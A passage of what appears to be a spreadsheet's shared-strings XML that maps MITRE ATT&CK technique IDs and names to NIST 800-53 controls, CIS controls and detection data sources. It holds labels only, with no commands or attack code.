  </si>
  <si>
    <t>AC-10,AC-14,AC-17,AC-6,CM-2,CM-5,CM-6,SC-18,SC-44,SI-8</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-11,CM-5,IA-2</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1546.014</t>
  </si>
  <si>
    <t>Emond</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-8,RA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>4.2,7.6,7.7</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-6,CM-7,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>Image: Image Creation, Image: Image Modification</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Application or System Exploitation</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Access</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>9.2,13.3,13.8</t>
  </si>
  <si>
    <t>AC-4,CA-7,SC-20,SC-21,SC-22,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1573.001</t>
  </si>
  <si>
    <t>Symmetric Cryptography</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>Asymmetric Cryptography</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>4.2,4.4,7.7,13.4</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SI-15,SI-4</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>Cloud Service Dashboard</t>
  </si>
  <si>
    <t>3.3,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>T1195.003</t>
  </si>
  <si>
    <t>Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>3.6,4.1</t>
  </si>
  <si>
    <t>CA-8,CM-3,CM-5,CM-8,IA-7,RA-9,SA-10,SA-11,SC-34,SI-2,SI-7</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,IA-2</t>
  </si>
  <si>
    <t>T1568.002</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>4.2,4.4,9.3,13.4</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-6,CM-7,SC-7,SI-10,SI-15</t>
  </si>
  <si>
    <t>User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1606.002</t>
  </si>
  <si>
    <t>SAML Tokens</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-6</t>
  </si>
  <si>
    <t>Command: Command Execution, Instance: Instance Metadata, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1037.005</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>2.7,3.3,4.1,6.1,6.2</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration, Cloud Service: Cloud Service Metadata</t>
  </si>
  <si>
    <t>T1548.004</t>
  </si>
  <si>
    <t>Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,SC-18,SC-34,SI-12,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1564.007</t>
  </si>
  <si>
    <t>VBA Stomping</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-8,SI-4</t>
  </si>
  <si>
    <t>T1546.011</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>4.1,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-6,SI-2</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>4.2,4.4,13.4</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-6,CM-7,SC-7,SI-15,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Module: Module Load, Network Traffic: Network Connection Creation, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>T1055.012</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>T1090.002</t>
  </si>
  <si>
    <t>External Proxy</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Group: Group Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1114.001</t>
  </si>
  <si>
    <t>Local Email Collection</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-19,AC-20,AC-4,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>7.6,7.7</t>
  </si>
  <si>
    <t>Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1606.001</t>
  </si>
  <si>
    <t>Web Cookies</t>
  </si>
  <si>
    <t>4.1,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-6,SI-2</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Cluster: Cluster Metadata, Container: Container Enumeration, Container: Container Metadata, Pod: Pod Enumeration, Pod: Pod Metadata</t>
  </si>
  <si>
    <t>T1598.001</t>
  </si>
  <si>
    <t>Spearphishing Service</t>
  </si>
  <si>
    <t>AC-4,CA-7,SC-44,SC-7,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</t>
  </si>
  <si>
    <t>14.1,14.3</t>
  </si>
  <si>
    <t>CA-7,CM-2,CM-6,IA-2,IA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>T1547.008</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>2.6,4.1</t>
  </si>
  <si>
    <t>CM-2,CM-6,RA-5,SC-39,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>Local Groups</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>Portable Executable Injection</t>
  </si>
  <si>
    <t>File: File Modification</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>T1055.003</t>
  </si>
  <si>
    <t>Thread Execution Hijacking</t>
  </si>
  <si>
    <t>Process: OS API Execution</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>AC-20,AC-4,SC-7</t>
  </si>
  <si>
    <t>T1484.001</t>
  </si>
  <si>
    <t>Group Policy Modification</t>
  </si>
  <si>
    <t>T1055.011</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>T1055.005</t>
  </si>
  <si>
    <t>Thread Local Storage</t>
  </si>
  <si>
    <t>File: File Metadata, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>Junk Data</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>T1055.013</t>
  </si>
  <si>
    <t>Process Doppelg'e4nging</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>Non-Standard Encoding</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>T1055.004</t>
  </si>
  <si>
    <t>Asynchronous Procedure Call</t>
  </si>
  <si>
    <t>T1055.014</t>
  </si>
  <si>
    <t>VDSO Hijacking</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1056.002</t>
  </si>
  <si>
    <t>GUI Input Capture</t>
  </si>
  <si>
    <t>CA-7,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1064</t>
  </si>
  <si>
    <t>Scripting</t>
  </si>
  <si>
    <t>T1552.003</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>CM-6,CM-7,SC-28,SI-4</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>T1548.001</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>T1547.002</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>CM-6,SC-39,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1547.005</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1574.006</t>
  </si>
  <si>
    <t>LD_PRELOAD</t>
  </si>
  <si>
    <t>CM-6,CM-7,SI-10,SI-7</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Enumeration, Cloud Storage: Cloud Storage Metadata, Instance: Instance Enumeration, Instance: Instance Metadata, Snapshot: Snapshot Enumeration, Snapshot: Snapshot Metadata, Volume: Volume Enumeration, Volume: Volume Metadata</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>AC-18,CM-6,CM-7,SI-4</t>
  </si>
  <si>
    <t>T1484.002</t>
  </si>
  <si>
    <t>Domain Trust Modification</t>
  </si>
  <si>
    <t>T1036.001</t>
  </si>
  <si>
    <t>Invalid Code Signature</t>
  </si>
  <si>
    <t>CM-2,CM-6,IA-9,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>PubPrn</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1562.003</t>
  </si>
  <si>
    <t>Impair Command History Logging</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1053.007</t>
  </si>
  <si>
    <t>Container Orchestration Job</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,IA-2,IA-8</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>Add-ins</t>
  </si>
  <si>
    <t>AC-6,CM-2,CM-6,SC-18,SC-44,SI-8</t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>Services Registry Permissions Weakness</t>
  </si>
  <si>
    <t>AC-6,CM-5</t>
  </si>
  <si>
    <t>T1555.001</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1567.001</t>
  </si>
  <si>
    <t>Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>T1556.002</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>SC-23</t>
  </si>
  <si>
    <t>T1550.004</t>
  </si>
  <si>
    <t>Web Session Cookie</t>
  </si>
  <si>
    <t>SC-23,SC-8,SI-7</t>
  </si>
  <si>
    <t>File: File Modification, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1036.007</t>
  </si>
  <si>
    <t>Double File Extension</t>
  </si>
  <si>
    <t>CA-7,CM-2,CM-6,CM-7,IA-2,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Process: Process Creation</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1546.009</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>CM-7,SI-10,SI-7</t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>Logon Script (Windows)</t>
  </si>
  <si>
    <t>AC-17,CM-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>T1564.001</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1175</t>
  </si>
  <si>
    <t>Component Object Model and Distributed COM</t>
  </si>
  <si>
    <t>T1590</t>
  </si>
  <si>
    <t>Gather Victim Network Information</t>
  </si>
  <si>
    <t>18.2,18.3</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Command: Command Execution, File: File Access, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>Audio Capture</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Metadata, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>Driver: Driver Metadata, Firmware: Firmware Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1592</t>
  </si>
  <si>
    <t>Gather Victim Host Information</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>T1590.001</t>
  </si>
  <si>
    <t>Domain Properties</t>
  </si>
  <si>
    <t>T1590.005</t>
  </si>
  <si>
    <t>IP Addresses</t>
  </si>
  <si>
    <t>T1027.003</t>
  </si>
  <si>
    <t>T1546.015</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>T1027.004</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>T1587.001</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>T1555.003</t>
  </si>
  <si>
    <t>Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1595.001</t>
  </si>
  <si>
    <t>Scanning IP Blocks</t>
  </si>
  <si>
    <t>T1590.002</t>
  </si>
  <si>
    <t>T1590.004</t>
  </si>
  <si>
    <t>Network Topology</t>
  </si>
  <si>
    <t>T1590.006</t>
  </si>
  <si>
    <t>Network Security Appliances</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Modification, Driver: Driver Metadata, Firmware: Firmware Modification, Network Traffic: Network Connection Creation, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1027.005</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>File: File Creation</t>
  </si>
  <si>
    <t>T1546.012</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>T1036.004</t>
  </si>
  <si>
    <t>Masquerade Task or Service</t>
  </si>
  <si>
    <t>T1074.001</t>
  </si>
  <si>
    <t>Local Data Staging</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1588.002</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>Tool</t>
  </si>
  <si>
    <t>T1090.004</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>SC-8</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1553.002</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Logon Session: Logon Session Creation, Module: Module Load, Process: OS API Execution, Process: Process Access, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1546.001</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>Direct Volume Access</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Access</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>T1588</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>T1592.002</t>
  </si>
  <si>
    <t>Software</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>System Checks</t>
  </si>
  <si>
    <t>T1134.004</t>
  </si>
  <si>
    <t>Parent PID Spoofing</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>Keylogging</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>T1069.003</t>
  </si>
  <si>
    <t>Cloud Groups</t>
  </si>
  <si>
    <t>T1056.004</t>
  </si>
  <si>
    <t>Credential API Hooking</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>Malware Repository: Malware Content, Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>T1588.001</t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>Credentials</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>T1590.003</t>
  </si>
  <si>
    <t>Network Trust Dependencies</t>
  </si>
  <si>
    <t>T1591</t>
  </si>
  <si>
    <t>Gather Victim Org Information</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>T1497.003</t>
  </si>
  <si>
    <t>Time Based Evasion</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>Right-to-Left Override</t>
  </si>
  <si>
    <t>Command: Command Execution, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1497.002</t>
  </si>
  <si>
    <t>User Activity Based Checks</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation</t>
  </si>
  <si>
    <t>T1560.002</t>
  </si>
  <si>
    <t>Archive via Library</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t>T1560.003</t>
  </si>
  <si>
    <t>Archive via Custom Method</t>
  </si>
  <si>
    <t>T1562.009</t>
  </si>
  <si>
    <t>Safe Mode Boot</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-10,CM-5,CM-6,CM-7,IA-2,IA-9,SC-23,SC-8,SI-7</t>
  </si>
  <si>
    <t>File: File Metadata, Script: Script Execution</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>Graphical User Interface</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1564.005</t>
  </si>
  <si>
    <t>Hidden File System</t>
  </si>
  <si>
    <t>T1564.008</t>
  </si>
  <si>
    <t>Email Hiding Rules</t>
  </si>
  <si>
    <t>AC-4,CM-3,CM-5,CM-7,IR-5,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1026</t>
  </si>
  <si>
    <t>Multiband Communication</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>Path Interception</t>
  </si>
  <si>
    <t>T1036.006</t>
  </si>
  <si>
    <t>Space after Filename</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1051</t>
  </si>
  <si>
    <t>Shared Webroot</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1153</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1218.013</t>
  </si>
  <si>
    <t>Mavinject</t>
  </si>
  <si>
    <t>T1218.014</t>
  </si>
  <si>
    <t>MMC</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>T1505.004</t>
  </si>
  <si>
    <t>IIS Components</t>
  </si>
  <si>
    <t>AC-17,AC-3,AC-4,AC-6,CA-8,CM-11,CM-2,CM-6,CM-7,CM-8,IA-2,RA-5,SA-10,SA-11,SC-7,SI-14,SI-16,SI-3,SI-4,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>T1546.005</t>
  </si>
  <si>
    <t>Trap</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1547.013</t>
  </si>
  <si>
    <t>XDG Autostart Entries</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CA-7,CM-11,CM-2,CM-3,CM-5,CM-6,IA-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1547.014</t>
  </si>
  <si>
    <t>Active Setup</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1547.015</t>
  </si>
  <si>
    <t>Login Items</t>
  </si>
  <si>
    <t>T1552.007</t>
  </si>
  <si>
    <t>Container API</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-23,AC-3,AC-4,AC-5,AC-6,CM-5,CM-6,CM-7,IA-2,SC-46,SC-7,SC-8</t>
  </si>
  <si>
    <t>T1553.005</t>
  </si>
  <si>
    <t>Mark-of-the-Web Bypass</t>
  </si>
  <si>
    <t>File: File Modification, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>T1553.006</t>
  </si>
  <si>
    <t>Code Signing Policy Modification</t>
  </si>
  <si>
    <t>AC-6,CA-8,CM-3,CM-5,CM-7,CM-8,IA-7,RA-9,SA-10,SA-11,SC-34,SI-2,SI-7</t>
  </si>
  <si>
    <t>T1555.004</t>
  </si>
  <si>
    <t>Windows Credential Manager</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,IA-5,SI-4</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1555.005</t>
  </si>
  <si>
    <t>Password Managers</t>
  </si>
  <si>
    <t>CM-2,CM-6,IA-2,IA-5,SI-2,SI-4</t>
  </si>
  <si>
    <t>T1562.010</t>
  </si>
  <si>
    <t>Downgrade Attack</t>
  </si>
  <si>
    <t>CM-2,CM-6,RA-5,SI-4</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
